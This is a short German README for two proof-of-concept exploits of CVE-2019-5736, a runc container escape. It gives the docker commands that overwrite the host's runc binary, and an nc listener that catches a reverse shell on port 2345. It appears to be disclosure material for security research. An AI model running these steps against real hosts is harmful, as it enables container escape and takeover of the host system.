
CVE-2019-5736 POCs
Zwei PoCs für CVE-2019-5736. Siehe Twistlock Labs für eine Erklärung von CVE-2019-5736 und den PoCs.
Der Malicious-Image-PoC basiert stark auf q3k’s PoC, daher gebührt ihm die ganze Anerkennung.
Beachten Sie, dass das Ausführen der PoCs die runc-Binärdatei auf dem Host überschreibt. Es wird empfohlen, eine Kopie Ihrer runc-Binärdatei (normalerweise unter /usr/sbin/runc) zu erstellen, bevor Sie einen der PoCs ausführen.
Klonen Sie das Repository:
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736
Überschreibt runc mit einem einfachen Programm, das einen String ausgibt.
Ausführen des Exec PoC:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash
Überschreibt runc mit einem einfachen Reverse-Shell-Bash-Skript, das sich mit localhost:2345 verbindet.
Hören Sie auf die Reverse Shell:
$ nc -nvlp 2345
Führen Sie von einer anderen Shell aus den Malicious-Image-PoC aus:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC